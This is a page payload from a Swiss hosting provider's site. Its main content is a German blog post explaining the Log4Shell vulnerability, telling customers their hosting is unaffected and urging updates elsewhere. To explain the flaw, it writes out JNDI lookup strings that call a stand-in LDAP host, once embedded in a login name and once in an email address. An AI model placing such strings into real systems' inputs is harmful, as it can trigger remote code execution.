[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"global":3,"main-menu-products":18,"main-menu-blog-posts":172,"footer-navigation":227,"blog-post-log4shell":409},[4,13],{"globalSet":5},{"alertBannerList":6},[7],{"id":8,"title":9,"alertType":10,"description":11,"linkLabel":12,"linkField":12},"4647","Dies ist eine Beta-Version der neuen cyon-Website","warning","\u003Cp>Einige Funktionen funktionieren möglicherweise \u003Cstrong>nicht\u003C\u002Fstrong> wie erwartet.\u003C\u002Fp>",null,{"globalSet":14},{"tokens":15},[16],{"key":17,"value":17},"",{"productsEntries":19,"productMetaMenuSections":126,"aboutEntries":130,"aboutMenuSections":167},[20,31,40,49,59,69,80,88,108,119],{"__typename":21,"title":22,"uri":23,"color":24,"subtitle":25,"productMenuSection":26,"productIcon":28},"productPageHostings_Entry","Webhosting","hosting\u002Fwebhosting","cherry","Alles, was deine Website braucht",[27],"hosting",[29],{"url":30},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fcherry.svg",{"__typename":21,"title":32,"uri":33,"color":34,"subtitle":35,"productMenuSection":36,"productIcon":37},"Webhosting Pro","hosting\u002Fwebhosting-pro","plum","Mehr Power für anspruchsvolle Webprojekte",[27],[38],{"url":39},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fplum.svg",{"__typename":21,"title":41,"uri":42,"color":43,"subtitle":44,"productMenuSection":45,"productIcon":46},"Sitebuilder","hosting\u002Fsitebuilder","strawberry","Deine eigene Website, überraschend einfach gemacht.",[27],[47],{"url":48},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fstrawberry.svg",{"__typename":21,"title":50,"uri":51,"color":52,"subtitle":53,"productMenuSection":54,"productIcon":56},"Managed Server","server\u002Fmanaged-server","pear","Dein eigener Server. Wir kümmern uns um den Rest.",[55],"server",[57],{"url":58},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fpear.svg",{"__typename":60,"title":61,"uri":62,"color":63,"subtitle":64,"productMenuSection":65,"productIcon":66},"productPageAgency_Entry","Agency Server","server\u002Fagency-server","grape","Deine Kundschaft, dein Server.",[55],[67],{"url":68},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fgrape.svg",{"__typename":70,"title":71,"uri":72,"color":73,"subtitle":74,"productMenuSection":75,"productIcon":77},"productPageDomain_Entry","Domains","domains\u002Fdomain-kaufen","bee","Alles beginnt mit deiner Domain",[76],"domains",[78],{"url":79},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fbee.svg",{"__typename":21,"title":81,"uri":82,"color":73,"subtitle":83,"productMenuSection":84,"productIcon":85},"Domain transferieren","domains\u002Fdomain-transferieren","Gönn deiner Domain ein schöneres Zuhause",[76],[86],{"url":87},"https:\u002F\u002Fcms.production-edge.cyon.ch\u002Ffiles\u002Fimages\u002FProduct-Icons\u002Fflower.svg",{"__typename":89,"title":90,"uri":91,"metaMenuTitle":92,"iconSelect":95,"productMenuSection":96,"directLink":97},"productPageMeta_Entry","my.cyon: Ein Login für alles","hosting\u002Fmy-cyon",[93],{"title":94},"Services","apps",[27,55,76],{"__typename":98,"type":99,"label":12,"link":100,"url":101,"urlSuffix":12,"entry":102},"LinkData","entry","\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fmy-cyon\">my.cyon: Ein Login für alles\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fmy-cyon",{"id":103,"uri":91,"slug":104,"title":90,"enabled":105,"typeHandle":106,"sectionHandle":107,"__typename":89},"5322","my-cyon",true,"productPageMeta","products",{"__typename":89,"title":109,"uri":110,"metaMenuTitle":111,"iconSelect":113,"productMenuSection":114,"directLink":115},"Umzugsservice","hosting\u002Fumzug",[112],{"title":94},"rocket",[27,55],{"__typename":98,"type":116,"label":12,"link":117,"url":118,"urlSuffix":12,"entry":12},"url","\u003Ca href=\"https:\u002F\u002Forder.cyon.ch\u002Forder\u002Fpublic\u002Fdomains\">order.cyon.ch\u002Forder\u002Fpublic\u002Fdomains\u003C\u002Fa>","https:\u002F\u002Forder.cyon.ch\u002Forder\u002Fpublic\u002Fdomains",{"__typename":89,"title":120,"uri":121,"metaMenuTitle":122,"iconSelect":124,"productMenuSection":125,"directLink":12},"https:\u002F\u002F für alle","hosting\u002Fssl",[123],{"title":94},"certificate",[27,55],[127,128],{"title":94},{"title":129},"Preise",[131,137,143,149,155,160],{"label":132,"uri":133,"aboutMenuTitle":134,"iconSelect":136,"directLink":12},"Über cyon","ueber-cyon\u002Fcyon-macht-das-internet-zu-einem-besseren-ort",[135],{"title":132},"mood-smile",{"label":138,"uri":139,"aboutMenuTitle":140,"iconSelect":142,"directLink":12},"Team","ueber-cyon\u002Fteam",[141],{"title":132},"users-group",{"label":144,"uri":145,"aboutMenuTitle":146,"iconSelect":148,"directLink":12},"Jobs","ueber-cyon\u002Fjobs",[147],{"title":132},"book",{"label":150,"uri":151,"aboutMenuTitle":152,"iconSelect":154,"directLink":12},"Geschichte","ueber-cyon\u002Fgeschichte",[153],{"title":132},"file-description",{"label":156,"uri":157,"aboutMenuTitle":158,"iconSelect":95,"directLink":12},"Partner*innen","ueber-cyon\u002Fpartner",[159],{"title":132},{"label":161,"uri":162,"aboutMenuTitle":163,"iconSelect":166,"directLink":12},"Nachhaltigkeit","ueber-cyon\u002Fnachhaltigkeit",[164],{"title":165},"Verantwortung & Vertrauen","leaf",[168,169,170],{"title":132},{"title":165},{"title":171},"Team & Kultur",[173,201],{"title":174,"commentCount":175,"categories":176,"slug":183,"excerpt":184,"featuredImage":185,"seo":188,"author":191,"date":199,"id":200},"Phishing-Angriffe: Was wir täglich dagegen tun",3,{"nodes":177},[178,181],{"id":179,"name":180},"dGVybTozNQ==","Blog",{"id":182,"name":132},"dGVybTo2NzAz","phishing-angriffe-was-wir-taeglich-dagegen-tun","\u003Cp>«Wurden wir gehackt?» Diese Frage hören wir von unserer Kundschaft im Support immer wieder, sagt Lindita, Customer Care Specialist bei cyon. Die Nachricht wirkt bedrohlich: Da steht die eigene Domain, eine bekannte E-Mail-Adresse, vielleicht sogar ein Ablaufdatum. Alles klingt echt. Entsprechend gross ist die Unsicherheit. In solchen Situationen weisst du vielleicht nicht, wie du die [&hellip;]\u003C\u002Fp>\n",{"node":186},{"sourceUrl":187},"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2026\u002F03\u002Fphishing-angriffe.png",{"opengraphImage":189},{"mediaItemUrl":190},"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2026\u002F03\u002Fphishing-angriffe-fb-li.jpg",{"node":192},{"id":193,"name":194,"email":195,"avatar":196},"dXNlcjozNw==","Svetlana Marchenko","sma@cyon.ch",{"url":197,"height":198,"width":198},"https:\u002F\u002Fsecure.gravatar.com\u002Favatar\u002Fa996559fe3a54e54474180cf9fd6292eb26e2bc18f22d8a3039785e3cdd14b53?s=96&d=mm&r=g",96,"2026-03-19T14:00:14","cG9zdDoyMjU0OQ==",{"title":202,"commentCount":203,"categories":204,"slug":210,"excerpt":211,"featuredImage":212,"seo":215,"author":218,"date":225,"id":226},"Welche Domains bei cyon am häufigsten registriert werden?",2,{"nodes":205},[206,207],{"id":179,"name":180},{"id":208,"name":209},"dGVybTo2NzAy","Neuigkeiten","cyon-domain-rangliste","\u003Cp>Die Wahl der passenden Domain-Endung ist ein zentraler Schritt für jede Website. Sie prägt, wie dein Projekt wahrgenommen wird, welche Zielgruppe du erreichst und wie klar dein Auftritt positioniert ist. In diesem Beitrag werfen wir einen Blick auf die beliebtesten Domain-Endungen unserer Kundinnen und Kunden, zeigen Entwicklungen der letzten Jahre auf und ordnen ein, was [&hellip;]\u003C\u002Fp>\n",{"node":213},{"sourceUrl":214},"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2026\u002F02\u002Fdomain-endungen.png",{"opengraphImage":216},{"mediaItemUrl":217},"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2026\u002F02\u002Fdomain-endungen-fb-li.png",{"node":219},{"id":220,"name":221,"email":222,"avatar":223},"dXNlcjozMg==","Mona Sorcelli","mos@cyon.ch",{"url":224,"height":198,"width":198},"https:\u002F\u002Fsecure.gravatar.com\u002Favatar\u002Fb2a78212ccc46cd4dbd3c34c1e94df688a1397ff1fda06be5dcd76c3ec142043?s=96&d=mm&r=g","2026-02-12T16:23:59","cG9zdDoyMjUxOQ==",{"footerNavigation":228,"googleRating":404},{"footerMenu":229},[230,269,287,309,332,385],{"title":231,"footerMenuItems":232},"Hosting",[233,241,248,255,262],{"title":22,"footerMenuItemLink":234},{"__typename":98,"type":99,"label":12,"link":235,"url":236,"urlSuffix":12,"entry":237},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fwebhosting\">Webhosting\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fwebhosting",{"id":238,"uri":23,"slug":239,"title":22,"enabled":105,"typeHandle":240,"sectionHandle":107,"__typename":21},"736","webhosting","productPageHostings",{"title":32,"footerMenuItemLink":242},{"__typename":98,"type":99,"label":12,"link":243,"url":244,"urlSuffix":12,"entry":245},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fwebhosting-pro\">Webhosting Pro\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fwebhosting-pro",{"id":246,"uri":33,"slug":247,"title":32,"enabled":105,"typeHandle":240,"sectionHandle":107,"__typename":21},"5348","webhosting-pro",{"title":41,"footerMenuItemLink":249},{"__typename":98,"type":99,"label":12,"link":250,"url":251,"urlSuffix":12,"entry":252},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fsitebuilder\">Sitebuilder\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fsitebuilder",{"id":253,"uri":42,"slug":254,"title":41,"enabled":105,"typeHandle":240,"sectionHandle":107,"__typename":21},"5360","sitebuilder",{"title":120,"footerMenuItemLink":256},{"__typename":98,"type":99,"label":12,"link":257,"url":258,"urlSuffix":12,"entry":259},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fssl\">https:\u002F\u002F für alle\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fssl",{"id":260,"uri":121,"slug":261,"title":120,"enabled":105,"typeHandle":106,"sectionHandle":107,"__typename":89},"4388","ssl",{"title":109,"footerMenuItemLink":263},{"__typename":98,"type":99,"label":12,"link":264,"url":265,"urlSuffix":12,"entry":266},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fumzug\">Umzugsservice\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fhosting\u002Fumzug",{"id":267,"uri":110,"slug":268,"title":109,"enabled":105,"typeHandle":106,"sectionHandle":107,"__typename":89},"4365","umzug",{"title":270,"footerMenuItems":271},"Server",[272,279],{"title":50,"footerMenuItemLink":273},{"__typename":98,"type":99,"label":12,"link":274,"url":275,"urlSuffix":12,"entry":276},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fserver\u002Fmanaged-server\">Managed Server\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fserver\u002Fmanaged-server",{"id":277,"uri":51,"slug":278,"title":50,"enabled":105,"typeHandle":240,"sectionHandle":107,"__typename":21},"5355","managed-server",{"title":61,"footerMenuItemLink":280},{"__typename":98,"type":99,"label":12,"link":281,"url":282,"urlSuffix":12,"entry":283},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fserver\u002Fagency-server\">Agency Server\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fserver\u002Fagency-server",{"id":284,"uri":62,"slug":285,"title":61,"enabled":105,"typeHandle":286,"sectionHandle":107,"__typename":60},"1444","agency-server","productPageAgency",{"title":71,"footerMenuItems":288},[289,297,304],{"title":71,"footerMenuItemLink":290},{"__typename":98,"type":99,"label":12,"link":291,"url":292,"urlSuffix":12,"entry":293},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fdomains\u002Fdomain-kaufen\">Domains\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fdomains\u002Fdomain-kaufen",{"id":294,"uri":72,"slug":295,"title":71,"enabled":105,"typeHandle":296,"sectionHandle":107,"__typename":70},"3330","domain-kaufen","productPageDomain",{"title":81,"footerMenuItemLink":298},{"__typename":98,"type":99,"label":12,"link":299,"url":300,"urlSuffix":12,"entry":301},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fdomains\u002Fdomain-transferieren\">Domain transferieren\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fdomains\u002Fdomain-transferieren",{"id":302,"uri":82,"slug":303,"title":81,"enabled":105,"typeHandle":240,"sectionHandle":107,"__typename":21},"4114","domain-transferieren",{"title":305,"footerMenuItemLink":306},"Alle Domains",{"__typename":98,"type":116,"label":12,"link":307,"url":308,"urlSuffix":12,"entry":12},"\u003Ca href=\"\u002Fdomains\u002Falle-domains\">\u002Fdomains\u002Falle-domains\u003C\u002Fa>","\u002Fdomains\u002Falle-domains",{"title":310,"footerMenuItems":311},"Support",[312,317,322,327],{"title":313,"footerMenuItemLink":314},"Support Center",{"__typename":98,"type":116,"label":12,"link":315,"url":316,"urlSuffix":12,"entry":12},"\u003Ca href=\"\u002Fsupport\">\u002Fsupport\u003C\u002Fa>","\u002Fsupport",{"title":318,"footerMenuItemLink":319},"E-Mail Zauberer",{"__typename":98,"type":116,"label":12,"link":320,"url":321,"urlSuffix":12,"entry":12},"\u003Ca href=\"\u002Fsupport\u002Fmailwizard\">\u002Fsupport\u002Fmailwizard\u003C\u002Fa>","\u002Fsupport\u002Fmailwizard",{"title":323,"footerMenuItemLink":324},"my.cyon",{"__typename":98,"type":116,"label":12,"link":325,"url":326,"urlSuffix":12,"entry":12},"\u003Ca href=\"https:\u002F\u002Fmy.cyon.ch\u002F\">my.cyon.ch\u003C\u002Fa>","https:\u002F\u002Fmy.cyon.ch\u002F",{"title":328,"footerMenuItemLink":329},"Webmail",{"__typename":98,"type":116,"label":12,"link":330,"url":331,"urlSuffix":12,"entry":12},"\u003Ca href=\"https:\u002F\u002Fwebmail.cyon.ch\u002F\">webmail.cyon.ch\u003C\u002Fa>","https:\u002F\u002Fwebmail.cyon.ch\u002F",{"title":333,"footerMenuItems":334},"Über uns",[335,346,354,362,369,376,378,379,381],{"title":336,"footerMenuItemLink":337},"Warum cyon",{"__typename":98,"type":99,"label":12,"link":338,"url":339,"urlSuffix":12,"entry":340},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fcyon-macht-das-internet-zu-einem-besseren-ort\">cyon macht das Internet zu einem besseren Ort\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fcyon-macht-das-internet-zu-einem-besseren-ort",{"id":341,"uri":133,"slug":342,"title":343,"enabled":105,"typeHandle":344,"sectionHandle":344,"__typename":345},"2016","cyon-macht-das-internet-zu-einem-besseren-ort","cyon macht das Internet zu einem besseren Ort","about","about_Entry",{"title":138,"footerMenuItemLink":347},{"__typename":98,"type":99,"label":12,"link":348,"url":349,"urlSuffix":12,"entry":350},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fteam\">Unser Team\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fteam",{"id":351,"uri":139,"slug":352,"title":353,"enabled":105,"typeHandle":344,"sectionHandle":344,"__typename":345},"2029","team","Unser Team",{"title":144,"footerMenuItemLink":355},{"__typename":98,"type":99,"label":12,"link":356,"url":357,"urlSuffix":12,"entry":358},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fjobs\">Jobs bei cyon\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fjobs",{"id":359,"uri":145,"slug":360,"title":361,"enabled":105,"typeHandle":344,"sectionHandle":344,"__typename":345},"3760","jobs","Jobs bei cyon",{"title":150,"footerMenuItemLink":363},{"__typename":98,"type":99,"label":12,"link":364,"url":365,"urlSuffix":12,"entry":366},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fgeschichte\">Geschichte\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fgeschichte",{"id":367,"uri":151,"slug":368,"title":150,"enabled":105,"typeHandle":344,"sectionHandle":344,"__typename":345},"3819","geschichte",{"title":156,"footerMenuItemLink":370},{"__typename":98,"type":99,"label":12,"link":371,"url":372,"urlSuffix":12,"entry":373},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fpartner\">Partner*innen\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Fueber-cyon\u002Fpartner",{"id":374,"uri":157,"slug":375,"title":156,"enabled":105,"typeHandle":344,"sectionHandle":344,"__typename":345},"3861","partner",{"title":377,"footerMenuItemLink":12},"Engagement",{"title":161,"footerMenuItemLink":12},{"title":380,"footerMenuItemLink":12},"Infrastruktur",{"title":180,"footerMenuItemLink":382},{"__typename":98,"type":116,"label":12,"link":383,"url":384,"urlSuffix":12,"entry":12},"\u003Ca href=\"\u002Fblog\">\u002Fblog\u003C\u002Fa>","\u002Fblog",{"title":386,"footerMenuItems":387},"Rechtliches",[388,400,402],{"title":389,"footerMenuItemLink":390},"AGB",{"__typename":98,"type":99,"label":12,"link":391,"url":392,"urlSuffix":12,"entry":393},"\u003Ca href=\"http:\u002F\u002Flocalhost:3000\u002Flegal\u002Fagb\">AGB\u003C\u002Fa>","http:\u002F\u002Flocalhost:3000\u002Flegal\u002Fagb",{"id":394,"uri":395,"slug":396,"title":389,"enabled":105,"typeHandle":397,"sectionHandle":398,"__typename":399},"6225","legal\u002Fagb","agb","legalPage","legalPages","legalPage_Entry",{"title":401,"footerMenuItemLink":12},"Datenschutzerklärung",{"title":403,"footerMenuItemLink":12},"Impressum",{"heroContent":405},{"__typename":406,"googleRating":407},"heroContent_ContentBlock",{"stars":408},4.8,{"id":410,"databaseId":411,"slug":412,"title":413,"content":414,"date":415,"modified":416,"commentCount":417,"status":418,"featuredImage":12,"categories":419,"seo":424,"author":433,"comments":440},"cG9zdDoxNDI2MQ==",14261,"log4shell","Log4Shell – Sicherheitslücke sorgt Ende 2021 für Furore","\u003Cp>Du hast es bestimmt mitbekommen, zurzeit sorgt eine Sicherheitslücke für Furore im Netz. Konkret handelt es sich um eine Schwachstelle in einer vielgenutzten Bibliothek, die für das Protokollieren in Java-Applikationen genutzt wird. So viel vorweg: \u003Cstrong>Dein Webhosting bei cyon ist davon nicht betroffen.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Cimg loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-14285\" src=\"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell.jpg\" alt=\"Log4shell: Sicherheitslücke sorgt Ende 2021 für Furore\" width=\"1200\" height=\"675\" srcset=\"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell.jpg 1200w, https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell-576x324.jpg 576w, https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell-600x338.jpg 600w, https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell-768x432.jpg 768w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \u002F>\u003C\u002Fp>\n\u003Ch2>Was ist Log4j und was ist das Problem?\u003C\u002Fh2>\n\u003Cp>Log4j, die von der Sicherheitslücke betroffene Softwarebibliothek, wird in Java-Applikationen genutzt, um Ereignisse zu protokollieren (zu «loggen»). Da die in Java nativ eingebauten Logging-Möglichkeiten doch eher rudimentär sind, wird Log4j in ziemlich vielen Java-Projekten eingesetzt.\u003C\u002Fp>\n\u003Cp>Die Sicherheitslücke, die unter der CVE-ID \u003Ca href=\"https:\u002F\u002Fcve.mitre.org\u002Fcgi-bin\u002Fcvename.cgi?name=CVE-2021-44228\">CVE-2021-44228\u003C\u002Fa> geführt wird, führt nun dazu, dass ein Angreifer beliebigen Code auf den Servern ausführen könnte. Ein typisches Szenario könnte beispielsweise so aussehen:\u003C\u002Fp>\n\u003Cp>Stell dir eine in Java geschriebene Software vor, die eine Anmeldemaske mit Loginname und Passwort für Nutzerinnen und Nutzer bereitstellt. Fehlgeschlagene Anmeldeversuche schreibt die Software mit Hilfe von Log4j in ein Logfile. Meldet sich der Nutzer \u003Ccode>Oliver\u003C\u002Fcode> mit einem falschen Passwort an, würde \u003Ccode>Invalid login from user Oliver\u003C\u002Fcode> in die Log-Datei geschrieben werden. So weit, so normal und ungefährlich.\u003C\u002Fp>\n\u003Cp>Nun besitzt Log4j aber ein Feature, das die zu loggenden Meldungen analysiert und dabei auch gewisse Funktionen ausführen kann. Bei Log4Shell lädt Log4j zusätzliche Informationen von einem \u003Ca title=\"Lightweight Directory Access Protocol – Wikipedia\" href=\"https:\u002F\u002Fde.wikipedia.org\u002Fwiki\u002FLightweight_Directory_Access_Protocol\">LDAP-Server\u003C\u002Fa> nach. Solange der Server, von dem die Informationen stammen, normale, gültige Informationen liefert, ist das auch kein Problem. Ganz anders jedoch, wenn der Server von einem Angreifer kontrolliert wird.\u003C\u002Fp>\n\u003Cp>Wird nämlich anstatt \u003Ccode>Invalid login from user Oliver\u003C\u002Fcode> die Zeichenfolge \u003Ccode>Invalid login from user ${jndi:ldap:\u002F\u002Fexample.com\u002Fa}\u003C\u002Fcode> protokolliert, analysiert Log4j die Eingabe und erkennt richtigerweise, dass hinter \u003Ccode>${jndi:ldap:\u002F\u002Fexample.com\u002Fa}\u003C\u002Fcode> ein LDAP-Server mit entsprechenden Informationen wartet. Im Fall eines Angriffs gehört der Server hinter \u003Ccode>example.com\u003C\u002Fcode> allerdings dem Angreifer und antwortet mit Java-Schadcode. Diesen nimmt Log4j entgegen und führt ihn aus. Das alleine ist schon ein grosses Problem.\u003C\u002Fp>\n\u003Cp>Doch es kommt noch schlimmer. Der Server, auf dem Log4j mit Java läuft, muss nicht einmal zwingend öffentlich erreichbar sein. Ein weiteres Beispiel:\u003C\u002Fp>\n\u003Cp>Du lässt mit deiner Java-Applikation Logfiles deines E-Mail-Server analysieren. Die Applikation ist nicht öffentlich und ausschliesslich über ein VPN erreichbar. Schafft es nun ein Angreifer, die oben erwähnte LDAP-Adresse in die Logfiles deines E-Mail-Servers zu bringen, würde Log4j wie erklärt die präparierte Adresse kontaktieren. Und damit wäre das Worst-Case-Szenario perfekt, denn \u003Ccode>test+(${jndi:ldap:\u002F\u002Fexample.com\u002Fa})@gmail.com\u003C\u002Fcode> ist, um wieder nur ein Beispiel zu nennen, eine valide E-Mail-Adresse. Ein E-Mail-Server würde diese Adresse normal verarbeiten und versuchen, eine E-Mail an diese Adresse zu versenden. Zwar würde der Versand am Ende zu einem Fehler führen, doch zu diesem Zeitpunkt ist die Adresse längst im Logfile gespeichert. Und sobald Log4j den Eintrag analysiert, würde der Schadcode vom entfernten LDAP-Server ausgeführt.\u003C\u002Fp>\n\u003Cdiv id=\"attachment_14276\" class=\"wp-caption alignnone\">\u003Cimg loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-14276\" class=\"size-full wp-image-14276\" src=\"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4j_attack.jpg\" alt=\"The log4j JNDI attack\" width=\"1204\" height=\"814\" srcset=\"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4j_attack.jpg 1204w, https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4j_attack-576x389.jpg 576w, https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4j_attack-600x406.jpg 600w, https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4j_attack-768x519.jpg 768w\" sizes=\"auto, (max-width: 1204px) 100vw, 1204px\" \u002F>\u003Cp id=\"caption-attachment-14276\" class=\"wp-caption-text\">Bild: \u003Ca href=\"https:\u002F\u002Fwww.ncsc.admin.ch\u002Fgovcert\">Swiss Government Computer Emergency Response Team, GovCERT.ch\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fcreativecommons.org\u002Flicenses\u002Fby-sa\u002F4.0\u002F\">CC BY-SA 4.0\u003C\u002Fa>\u003C\u002Fp>\u003C\u002Fdiv>\n\u003Ch2>Ist cyon betroffen?\u003C\u002Fh2>\n\u003Cp>Die Sicherheitslücke wurde im Verlaufe des Freitags, 10.12.2021 einer breiteren Öffentlichkeit bekannt. Unser Security-Team hatte direkt nach dem Bekanntwerden der Lücke einen Plan aufgestellt, wie wir der Sicherheitslücke begegnen und bereits am Wochenende mit der Umsetzung der nötigen Massnahmen begonnen.\u003C\u002Fp>\n\u003Cp>Dabei wurde als erstes die Frage geklärt, welche unserer Java-Software Log4j verwendet. Während wir Java auf unseren Hosting-Servern nicht einsetzen, haben wir einzelne, vor allem interne Dienste, die auf Java basieren.\u003C\u002Fp>\n\u003Cp>Wir haben dann alle diese Dienste analysiert und wo nötig sofort Updates vorgenommen. War ein Update nicht möglich, haben wir die entsprechende Konfiguration angepasst, damit die Sicherheitslücke nicht ausgenutzt werden kann. Anschliessend haben wir unsere Logs durchforstet. Ziel dieser Aktion: Wir wollten herausfinden, ob bereits Angriffsversuche stattgefunden hatten. Wir konnten vereinzelte Versuche finden, die jedoch nicht erfolgreich waren.\u003C\u002Fp>\n\u003Ch2>Sind ich oder mein Webhosting betroffen?\u003C\u002Fh2>\n\u003Cp>Wie oben erwähnt, setzen wir auf den Servern unserer Kundschaft kein Java ein und es können darauf auch keine Java-Applikationen betrieben werden. Daher ist dein Webhosting von der Lücke nicht betroffen.\u003C\u002Fp>\n\u003Ch2>Soll ich sonst etwas unternehmen?\u003C\u002Fh2>\n\u003Cp>Nutzt du Java-Software bei anderen Anbietern oder hast sonst Java-Applikationen im Einsatz solltest du dringend prüfen, ob die Applikation von der Lücke betroffen ist und wenn nötig Updates dafür einspielen. Auch wenn du Java-Software auf deinem Computer im Einsatz hast, solltest du dich dringend darum kümmern. Die Sicherheitslücke wird aktiv ausgenutzt und von Angreifern für die Verbreitung von Malware genutzt.\u003C\u002Fp>\n\u003Cp>Wenn du dich weiter über das Thema informieren möchtest, ist der Blog vom \u003Ca href=\"https:\u002F\u002Fwww.ncsc.admin.ch\u002Fgovcert\">Swiss Government Computer Emergency Response Team (GovCERT)\u003C\u002Fa> eine gute Anlaufstelle.\u003C\u002Fp>\n\u003Cp>Titelbild: \u003Ca href=\"https:\u002F\u002Funsplash.com\u002F@nahelabdlhadi\">Nahel Abdul Hadi\u002FUnsplash\u003C\u002Fa>\u003C\u002Fp>\n","2021-12-16T14:04:31","2025-02-20T14:59:41",0,"publish",{"nodes":420},[421],{"id":422,"name":423},"dGVybTo2NzAx","Internet & Recht",{"fullHead":425,"metaDesc":426,"metaRobotsNofollow":427,"metaRobotsNoindex":428,"title":429,"opengraphModifiedTime":430,"opengraphImage":431},"\u003C!-- This site is optimized with the Yoast SEO Premium plugin  - https:\u002F\u002Fyoast.com\u002Fproduct\u002Fyoast-seo-premium-wordpress\u002F -->\n\u003Cmeta name=\"description\" content=\"Zurzeit sorgt eine Sicherheitslücke für Furore im Netz. So viel vorweg: Dein Webhosting bei cyon ist davon nicht betroffen.\" \u002F>\n\u003Clink rel=\"canonical\" href=\"https:\u002F\u002Fwww.cyon.ch\u002Fblog\u002Flog4shell\" \u002F>\n\u003Cmeta property=\"og:locale\" content=\"de_DE\" \u002F>\n\u003Cmeta property=\"og:type\" content=\"article\" \u002F>\n\u003Cmeta property=\"og:title\" content=\"Log4Shell - Sicherheitslücke sorgt Ende 2021 für Furore\" \u002F>\n\u003Cmeta property=\"og:description\" content=\"Zurzeit sorgt eine Sicherheitslücke für Furore im Netz. So viel vorweg: Dein Webhosting bei cyon ist davon nicht betroffen.\" \u002F>\n\u003Cmeta property=\"og:url\" content=\"https:\u002F\u002Fwww.cyon.ch\u002Fblog\u002Flog4shell\" \u002F>\n\u003Cmeta property=\"og:site_name\" content=\"cyon-Blog\" \u002F>\n\u003Cmeta property=\"article:publisher\" content=\"https:\u002F\u002Fwww.facebook.com\u002Fcyonhosting\" \u002F>\n\u003Cmeta property=\"article:published_time\" content=\"2021-12-16T13:04:31+00:00\" \u002F>\n\u003Cmeta property=\"article:modified_time\" content=\"2025-02-20T13:59:41+00:00\" \u002F>\n\u003Cmeta property=\"og:image\" content=\"https:\u002F\u002Fblog.cyon.ch\u002Fwp-content\u002Fuploads\u002F2021\u002F12\u002Flog4shell-fb-li.jpg\" \u002F>\n\t\u003Cmeta property=\"og:image:width\" content=\"1200\" \u002F>\n\t\u003Cmeta property=\"og:image:height\" content=\"630\" \u002F>\n\t\u003Cmeta 